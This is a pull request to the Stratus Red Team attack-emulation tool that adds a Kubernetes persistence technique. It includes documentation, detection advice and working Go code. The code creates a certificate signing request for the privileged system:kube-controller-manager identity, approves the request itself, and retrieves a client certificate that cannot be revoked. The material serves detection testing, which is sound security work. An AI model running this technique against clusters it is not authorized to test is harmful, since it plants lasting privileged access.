### PR TITLE
Add new attack technique for Kubernetes persistence

### DIFF
--- a/docs/attack-techniques/kubernetes/index.md
+++ b/docs/attack-techniques/kubernetes/index.md
@@ -15,6 +15,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 - [Create Admin ClusterRole](./k8s.persistence.create-admin-clusterrole.md)
 
+- [Create Client Certificate Credential](./k8s.persistence.create-client-certificate.md)
+
 - [Create Long-Lived Token](./k8s.persistence.create-token.md)
 
 

--- a/docs/attack-techniques/kubernetes/k8s.persistence.create-client-certificate.md
+++ b/docs/attack-techniques/kubernetes/k8s.persistence.create-client-certificate.md
@@ -1,0 +1,49 @@
+---
+title: Create Client Certificate Credential
+---
+
+# Create Client Certificate Credential
+
+
+ <span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: Kubernetes
+
+## MITRE ATT&CK Tactics
+
+
+- Persistence
+
+## Description
+
+
+Creates a client certificate for a privileged user. This client certificate can be used to authenticate to the cluster.
+
+<span style="font-variant: small-caps;">Warm-up</span>: None
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Create a certificate signing request (CSR)
+- Wait for the CSR to be picked up and return a certificate
+- Print the client-side certificate and private key
+
+Note: This attack technique does not succeed on AWS EKS. Due to apparent [undocumented behavior](https://github.com/aws/containers-roadmap/issues/1604), 
+the managed EKS control plane does not issue a certificate for the certificate signing request (CSR), even when approved. However, it is still relevant
+to simulate attacker behavior.
+
+Note: The certificate is issued to <code>system:kube-controller-manager</code> because it exists in most clusters, and already has a ClusterRoleBinding to <code>ClusterRole/system:kube-controller-manager</code>
+which includes privileged permissions, such as access all secrets of the cluster and create tokens for any service account.
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate k8s.persistence.create-client-certificate
+```
+## Detection
+
+
+Using Kubernetes API server audit logs. In particular, look for creation and approval of CSR objects, which do 
+not relate to standard cluster operation (e.g. Kubelet certificate issuance).
+
+

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -45,6 +45,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Dump All Secrets](./kubernetes/k8s.credential-access.dump-secrets.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Steal Pod Service Account Token](./kubernetes/k8s.credential-access.steal-serviceaccount-token.md) | [Kubernetes](./kubernetes/index.md) | Credential Access |
 | [Create Admin ClusterRole](./kubernetes/k8s.persistence.create-admin-clusterrole.md) | [Kubernetes](./kubernetes/index.md) | Persistence, Privilege Escalation |
+| [Create Client Certificate Credential](./kubernetes/k8s.persistence.create-client-certificate.md) | [Kubernetes](./kubernetes/index.md) | Persistence |
 | [Create Long-Lived Token](./kubernetes/k8s.persistence.create-token.md) | [Kubernetes](./kubernetes/index.md) | Persistence |
 | [Container breakout via hostPath volume mount](./kubernetes/k8s.privilege-escalation.hostpath-volume.md) | [Kubernetes](./kubernetes/index.md) | Privilege Escalation |
 | [Privilege escalation through node/proxy permissions](./kubernetes/k8s.privilege-escalation.nodes-proxy.md) | [Kubernetes](./kubernetes/index.md) | Privilege Escalation |

--- a/v2/internal/attacktechniques/k8s/persistence/create-client-certificate/main.go
+++ b/v2/internal/attacktechniques/k8s/persistence/create-client-certificate/main.go
@@ -1,0 +1,125 @@
+package kubernetes
+
+import (
+	"context"
+	"crypto/rand"
+	"crypto/rsa"
+	"crypto/x509"
+	"crypto/x509/pkix"
+	"encoding/asn1"
+	"encoding/pem"
+	"errors"
+	"log"
+	"time"
+
+	"github.com/datadog/stratus-red-team/v2/internal/providers"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus"
+	"github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+	certificates "k8s.io/api/certificates/v1"
+	v1core "k8s.io/api/core/v1"
+
+	v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+)
+
+func init() {
+
+	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+		ID:                 "k8s.persistence.create-client-certificate",
+		FriendlyName:       "Create Client Certificate Credential",
+		Platform:           stratus.Kubernetes,
+		IsIdempotent:       true,
+		MitreAttackTactics: []mitreattack.Tactic{mitreattack.Persistence},
+		Description: `
+Creates a client certificate for a privileged user which can be used to authenticate to the cluster.
+`,
+		Detection: `
+Using Kubernetes API server audit logs. In particular, look for creation and approval of CSR objects, which do 
+not relate to standard cluster operation (e.g. Kubelet certificate issuance).
+
+`,
+		Detonate: detonate,
+	})
+}
+
+const csrName = "stratus-red-team-csr"
+
+func detonate(map[string]string) error {
+	client := providers.K8s().GetClient()
+
+	key, err := rsa.GenerateKey(rand.Reader, 1024)
+	if err != nil {
+		return errors.New("Unable to generate a RSA key: " + err.Error())
+	}
+	commonName := "system:kube-controller-manager"
+	subject := pkix.Name{
+		CommonName: commonName,
+	}
+	asn1, err := asn1.Marshal(subject.ToRDNSequence())
+	if err != nil {
+		return errors.New("Unable to marshal ASN.1: " + err.Error())
+	}
+	csrReq := x509.CertificateRequest{
+		RawSubject:         asn1,
+		SignatureAlgorithm: x509.SHA256WithRSA,
+	}
+	bytes, err := x509.CreateCertificateRequest(rand.Reader, &csrReq, key)
+	if err != nil {
+		return errors.New("Unable to generate Certificate Signing request: " + err.Error())
+	}
+	csr := &certificates.CertificateSigningRequest{
+		ObjectMeta: v1.ObjectMeta{
+			Name: csrName,
+		},
+		Spec: certificates.CertificateSigningRequestSpec{
+			Groups: []string{
+				"system:authenticated",
+			},
+			SignerName: "kubernetes.io/kube-apiserver-client",
+			Usages: []certificates.KeyUsage{
+				"client auth",
+			},
+			Request: pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE REQUEST", Bytes: bytes}),
+		},
+	}
+	_, err = client.CertificatesV1().CertificateSigningRequests().Create(context.Background(), csr, v1.CreateOptions{})
+	if err != nil {
+		return errors.New("Unable to create certificate signing request: " + err.Error())
+
+	}
+
+	csr.Status.Conditions = append(csr.Status.Conditions, certificates.CertificateSigningRequestCondition{
+		Type:           certificates.CertificateApproved,
+		Status:         v1core.ConditionTrue,
+		Reason:         "User activation",
+		Message:        "This CSR was approved",
+		LastUpdateTime: v1.Now(),
+	})
+	csr, err = client.CertificatesV1().CertificateSigningRequests().UpdateApproval(context.Background(), csrName, csr, v1.UpdateOptions{})
+	if err != nil {
+		return errors.New("Unable to update Certificate approval: " + err.Error())
+	}
+	time.Sleep(2 * time.Second)
+	csr, err = client.CertificatesV1().CertificateSigningRequests().Get(context.Background(), csr.GetName(), v1.GetOptions{})
+	if err != nil {
+		return errors.New("Unable to retrieve client certificate " + err.Error())
+	}
+	pb, _ := pem.Decode(csr.Status.Certificate)
+	//This section is needed to handle cases where the CSR was created but signing didn't occur
+	//For example EKS. We clean up the CSR first then exit.
+	if pb == nil {
+		_ = client.CertificatesV1().CertificateSigningRequests().Delete(context.Background(), csr.GetName(), v1.DeleteOptions{})
+		return errors.New("unable to retrieve client certificate signing did not happen")
+	}
+
+	issuedCert, err := x509.ParseCertificate(pb.Bytes)
+	if err != nil {
+		return errors.New("Unable to parse x509 certificate: " + err.Error())
+	}
+
+	log.Printf("Certificate successfully issued to %s, by %s, valid until %s\n", issuedCert.Subject.CommonName, issuedCert.Issuer.CommonName, issuedCert.NotAfter.String())
+	err = client.CertificatesV1().CertificateSigningRequests().Delete(context.Background(), csr.GetName(), v1.DeleteOptions{})
+	if err != nil {
+		return errors.New("Unable to delete CSR: " + err.Error())
+	}
+	return nil
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -37,6 +37,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/credential-access/dump-secrets"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/credential-access/steal-serviceaccount-token"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/persistence/create-admin-clusterrole"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/persistence/create-client-certificate"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/persistence/create-token"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/privilege-escalation/hostpath-volume"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/k8s/privilege-escalation/nodes-proxy"


### PR DESCRIPTION
### What does this PR do?

Adds a new Attack technique which creates and approves a Kubernetes Client Certificate with a username of `system:kube-controller-manager` which is a standard high-privileged user account in Kubernetes.

As Kubernetes does not allow for certificate revocation, this is a good persistence technique for attackers who have gained access to Kubernetes clusters (similar to the Token Request API)

### Motivation

There's two motivations for this technique. First is the standard of ensuring that cluster auditing are picking this up correctly. The second is with managed Kubernetes testing implementations to see if this feature works. For example in EKS it is not documented clearly whether general CSR process works.

### Checklist

<!--
For new attack techniques
-->
- [X] The attack technique emulates a single attack step, not a full attack chain
- [ ] We have factual evidence & references that the attack technique was used by real malware, pentesters, or attackers
- [X] The attack technique makes no assumption about the state of the environment prior to warming it up